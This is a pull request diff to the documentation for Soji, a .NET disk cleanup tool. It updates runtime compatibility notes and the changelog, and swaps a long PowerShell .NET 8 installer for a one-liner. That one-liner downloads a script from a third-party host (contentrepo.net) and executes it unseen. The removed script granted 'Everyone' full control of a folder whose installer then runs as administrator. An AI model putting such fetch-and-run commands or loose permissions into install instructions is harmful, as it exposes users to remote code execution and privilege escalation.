### PR TITLE
Soji

### DIFF
--- a/docs/apps/soji.md
+++ b/docs/apps/soji.md
@@ -9,7 +9,7 @@ tags: ['disk', 'disk-cleanup']
 draft: false
 unlisted: false
 last_update:
-  date: 2026-03-23
+  date: 2026-07-14
 ---
 
 <br />
@@ -27,7 +27,7 @@ Soji is an intelligent yet simple disk cleanup utility that uses both native `Sy
 
 ### Built With
 
-- [.NET Desktop Runtime 8.0](https://dotnet.microsoft.com/en-us/download/dotnet/8.0)
+* [.NET 8.0](https://dotnet.microsoft.com/en-us/download/dotnet/8.0) (Configured to automatically roll forward to newer major versions)
 
 ### Important Note
 
@@ -35,284 +35,23 @@ Soji is a destructive application by nature in that it deletes files and folders
 
 ## Getting Started
 
-Install the .NET 8.0 runtime, read the documentation on using the various switches, and start running Soji! 🧹
+Install a supported .NET Desktop Runtime (8.0, 9.0, 10.0, or newer) and then simply download and run Soji.exe to get started.
+
+> **Note on Compatibility:** While Soji is compiled against .NET 8, it is configured using the `<RollForward>Major</RollForward>` property. This ensures that the application will automatically and seamlessly run on .NET 9, .NET 10, or future major desktop runtimes if .NET 8 is not installed on the host machine. This was implemented to guarantee continued functionality and security as older runtimes reach their End of Life.
 
 ### Prerequisites
 
-.NET 8.0:
+* .NET 8.0 Desktop Runtime (or a newer major version, such as .NET 9 or 10)
 
-```powershell
-winget install Microsoft.DotNet.DesktopRuntime.8
-```
+  ```shell
+  winget install Microsoft.DotNet.DesktopRuntime.10
+  ```
 
-Or
+  or
 
-```powershell
-# PowerShell installation of .NET Desktop Runtime 8.x.xx (latest version)
-<#
-.SYNOPSIS
-    Installs the latest available .NET Desktop Runtime 8 version if it is not already installed.
-
-.DESCRIPTION
-    Checks the local endpoint for installed Microsoft Windows Desktop Runtime versions by calling
-    Get-InstalledDotNetDesktopRuntime. If major version 8 is already installed, the script exits
-    without changes.
-
-    If not installed, the script:
-    - Creates a working directory under ProgramData.
-    - Ensures required ACL permissions on that directory.
-    - Enforces TLS 1.2/1.3 for outbound web requests.
-    - Detects OS architecture and maps it to the appropriate RID.
-    - Retrieves the latest .NET 8 Windows Desktop Runtime installer URL from Microsoft's
-      official release metadata feed.
-    - Downloads and silently installs the runtime.
-    - Verifies installation and cleans up the installer binary.
-
-    This script is intended for automated execution in RMM/automation workflows.
-
-.EXAMPLE
-    .\Install-dotNet8DesktopRuntime.ps1
-
-    Runs the full detection-and-install workflow. If .NET Desktop Runtime 8 is already installed,
-    the script returns a no-action message.
-
-.OUTPUTS
-    System.String
-
-    Returns:
-    - '.NET Desktop Runtime 8 is already installed. No action is required.' when no install is needed.
-
-    Writes informational progress messages during install path execution and throws terminating
-    errors when download, install, or verification fails.
-
-.NOTES
-    - Requires Windows with PowerShell 5.1+.
-    - Requires administrative privileges for install and ProgramData operations.
-    - Uses BITS for download and Start-Process for silent installer execution.
-    - Release metadata source: https://builds.dotnet.microsoft.com/dotnet/release-metadata/8.0/releases.json
-#>
-begin {
-    #region globals
-    $ProgressPreference = 'SilentlyContinue'
-    $WarningPreference = 'SilentlyContinue'
-    $InformationPreference = 'Continue'
-    $ConfirmPreference = 'None'
-    #endRegion
-
-    #region variables
-    $appName = 'dotNet8DesktopRuntime'
-    $workingDirectory = '{0}\_Automation\Script\{1}' -f $env:ProgramData, $appName
-    $appPath = '{0}\{1}.exe' -f $workingDirectory, $appName
-    $url = 'https://builds.dotnet.microsoft.com/dotnet/release-metadata/8.0/releases.json'
-    $installerArguments = @(
-        '/install',
-        '/quiet',
-        '/norestart'
-    )
-    #endRegion
-
-    #region function
-    function Get-InstalledDotNetDesktopRuntime {
-        <#
-        .SYNOPSIS
-            Gets installed .NET Windows Desktop Runtime versions from the local endpoint.
-
-        .DESCRIPTION
-            Resolves the path to `dotnet.exe` and executes `dotnet --list-runtimes`, then parses
-            the output and returns only Windows Desktop Runtime entries (Microsoft.WindowsDesktop.App).
-
-            The function returns one object per detected runtime version with friendly name,
-            major version, full version, and installed path.
-
-        .PARAMETER None
-            This function does not accept parameters.
-
-        .OUTPUTS
-            System.Object[]
-
-            Each object contains:
-            - Name          : Friendly display name (for example, Microsoft Windows Desktop Runtime - 8.0.25)
-            - MajorVersion  : Major version number as Int32
-            - Version       : Full semantic version string
-            - InstalledPath : Runtime install path reported by dotnet
-
-        .EXAMPLE
-            $installedRuntimes = Get-InstalledDotNetDesktopRuntime
-
-            Returns all installed Windows Desktop Runtime versions.
-
-        .EXAMPLE
-            Get-InstalledDotNetDesktopRuntime | Where-Object { $_.MajorVersion -eq 8 }
-
-            Returns only .NET 8 Windows Desktop Runtime entries.
-
-        .NOTES
-            Used by this script to verify whether .NET Desktop Runtime 8 is already present
-            before installation and to confirm installation success afterward.
-        #>
-        [CmdletBinding()]
-        [OutputType([System.Object[]])]
-        param()
-
-        #region dotnet path
-        $dotnetCommand = Get-Command 'dotnet' -ErrorAction SilentlyContinue
-        if ($dotnetCommand) {
-            $dotNetExePath = $dotnetCommand.Source
-        } else {
-            $dotNetExePath = '{0}\dotnet\dotnet.exe' -f $env:ProgramFiles
-        }
-        #endRegion
-
-        #region variables
-        $listRuntimesCommand = '{0}{1}{0} --list-runtimes' -f [char]34, $dotNetExePath
-        $installed = @()
-        #endRegion
-
-        #region retrieve installed .net info
-        $runtimes = cmd.exe /c $listRuntimesCommand
-        #endRegion
-
-        #region create installed versions object
-        foreach ($line in $runtimes) {
-            if ($line -match '^((?<Name>.+?)\s+)?(?<Version>\d+\.\d+\.\d+)\s\[(?<Path>[^\]]+)\]$') {
-                $name = $matches['Name']
-                $version = $matches['Version']
-                $path = $matches['Path']
-
-                if ($path -notmatch 'Microsoft.WindowsDesktop.App') {
-                    continue
-                }
-                $name = 'Microsoft Windows Desktop Runtime - {0}' -f $version
-
-                $obj = [PSCustomObject]@{
-                    Name          = $name
-                    MajorVersion  = ([Version]$version).Major
-                    Version       = $version
-                    InstalledPath = $path
-                }
-                $installed += $obj
-            }
-        }
-        #endRegion
-        return $installed
-    }
-    #endRegion
-} process {
-    #region check if .net desktop runtime 8 is installed
-    $installedRuntimes = Get-InstalledDotNetDesktopRuntime
-    $runtime8Installed = $installedRuntimes | Where-Object { $_.MajorVersion -eq 8 }
-    if ($runtime8Installed) {
-        return '.NET Desktop Runtime 8 is already installed. No action is required.'
-    } else {
-        Write-Information -MessageData '.NET Desktop Runtime 8 is not installed. Proceeding with installation.'
-    }
-
-    #region working directory
-    if (-not (Test-Path -Path $workingDirectory)) {
-        try {
-            New-Item -Path $workingDirectory -ItemType Directory -Force -ErrorAction Stop | Out-Null
-        } catch {
-            throw ('Failed to Create working directory {0}. Reason: {1}' -f $workingDirectory, $Error[0].Exception.Message)
-        }
-    }
-
-    $acl = Get-Acl -Path $workingDirectory
-    $hasFullControl = $acl.Access | Where-Object {
-        $_.IdentityReference -match 'Everyone' -and $_.FileSystemRights -match 'FullControl'
-    }
-    if (-not $hasFullControl) {
-        $accessRule = New-Object -TypeName System.Security.AccessControl.FileSystemAccessRule(
-            'Everyone', 'FullControl', 'ContainerInherit, ObjectInherit', 'None', 'Allow'
-        )
-        $acl.AddAccessRule($accessRule)
-        Set-Acl -Path $workingDirectory -AclObject $acl -ErrorAction SilentlyContinue
-    }
-    #endRegion
-
-    #region set tls policy
-    $supportedTLSversions = [enum]::GetValues('Net.SecurityProtocolType')
-    if (($supportedTLSversions -contains 'Tls13') -and ($supportedTLSversions -contains 'Tls12')) {
-        [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol::Tls13 -bor [System.Net.SecurityProtocolType]::Tls12
-    } elseif ($supportedTLSversions -contains 'Tls12') {
-        [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
-    } else {
-        Write-Information -MessageData 'TLS 1.2 and/or TLS 1.3 are not supported on this system. This download may fail!'
-        if ($PSVersionTable.PSVersion.Major -lt 3) {
-            Write-Information -MessageData 'PowerShell 2 / .NET 2.0 doesn''t support TLS 1.2.'
-        }
-    }
-    #endRegion
-
-    #region get os architecture
-    try {
-        $osArchitecture = (Get-CimInstance -ClassName 'Win32_OperatingSystem' -ErrorAction Stop).OSArchitecture
-    } catch {
-        Write-Information -MessageData 'Failed to determine OS architecture. Defaulting to win-x64.'
-        $osArchitecture = '64-bit'
-    }
-    $rid = if ($osArchitecture -eq '64-bit') {
-        'win-x64'
-    } elseif ($osArchitecture -eq '32-bit') {
-        'win-x86'
-    } else {
-        'win-arm64'
-    }
-    #endRegion
-
-    #region fetch latest download url for .net desktop runtime 8
-    try {
-        $downloadUrl = (Invoke-RestMethod -Uri $url -UseBasicParsing -ErrorAction Stop).releases |
-            Sort-Object -Property 'release-date' -Descending |
-            Select-Object -First 1 |
-            Select-Object -ExpandProperty 'windowsdesktop' |
-            Select-Object -ExpandProperty 'files' |
-            Where-Object { $_.rid -eq $rid -and $_.url -match '\.exe$' } |
-            Select-Object -ExpandProperty 'url'
-    } catch {
-        throw ('Failed to retrieve .NET release information from {0}. Reason: {1}' -f $url, $Error[0].Exception.Message)
-    }
-    if (-not $downloadUrl) {
-        throw ('Failed to find a suitable .NET Desktop Runtime 8 download for RID {0} from {1}' -f $rid, $url)
-    } else {
-        Write-Information -MessageData ('Latest .NET Desktop Runtime 8 installer URL: {0}' -f $downloadUrl)
-    }
-    #endRegion
-
-    #region download installer
-    try {
-        Write-Information -MessageData ('Downloading .NET Desktop Runtime 8 installer from {0}' -f $downloadUrl)
-        Start-BitsTransfer -Source $downloadUrl -Destination $appPath -ErrorAction Stop
-    } catch {
-        throw ('Failed to download .NET Desktop Runtime 8 installer from {0}. Reason: {1}' -f $downloadUrl, $Error[0].Exception.Message)
-    }
-    Unblock-File -Path $appPath -ErrorAction SilentlyContinue
-    #endRegion
-
-    #region install .net desktop runtime 8
-    try {
-        $installCommand = '{0} {1}' -f $appPath, ($installerArguments -join ' ')
-        Write-Information -MessageData ('Executing installer command: {0}' -f $installCommand)
-        Start-Process -FilePath $appPath -ArgumentList $installerArguments -Wait -NoNewWindow
-    } catch {
-        throw ('Failed to execute .NET Desktop Runtime 8 installer. Reason: {0}' -f $Error[0].Exception.Message)
-    }
-    #endRegion
-
-    #region verify installation
-    $installedRuntimes = Get-InstalledDotNetDesktopRuntime
-    $runtime8Installed = $installedRuntimes | Where-Object { $_.MajorVersion -eq 8 }
-    if ($runtime8Installed) {
-        Write-Information -MessageData '.NET Desktop Runtime 8 installation verified successfully.'
-    } else {
-        throw 'Error: .NET Desktop Runtime 8 installation failed or could not be verified.'
-    }
-    #endRegion
-} end {
-    #region cleanup installer
-    Remove-Item -Path $appPath -Force -ErrorAction SilentlyContinue
-    #endRegion
-}
-```
+  ```powershell
+  try { & ([scriptblock]::Create((Invoke-RestMethod -Uri 'https://contentrepo.net/repo/script/optimize-dotnetruntime.ps1'))) -Action Install -Type desktopRuntime -Version 10 -ErrorAction Stop; return 'Success: .Net 10 Desktop Runtime installation completed successfully.' } catch { throw ('Error: Failed to install .Net 10 Desktop Runtime. Reason: {0}' -f $Error[0].Exception.Message) }
+  ```
 
 ## Usage
 
@@ -417,6 +156,11 @@ Log and Report Files:
 - [BurnBytes](https://github.com/builtbybel/burnbytes) - Base logic for cleanmgr hooks
 
 ## Changelog
+
+### 2026-07-14
+
+- Added automatic compatibility for future .NET runtimes (9.0, 10.0+) to prevent end-of-life disruptions.
+- Added `SizeBefore`, `SizeAfter`, and `AmountCleaned` columns to the directory cleanup reports.
 
 ### 2026-03-23
 


### PR DESCRIPTION
- Added automatic compatibility for future .NET runtimes (9.0, 10.0+) to prevent end-of-life disruptions.
- Added `SizeBefore`, `SizeAfter`, and `AmountCleaned` columns to the directory cleanup reports.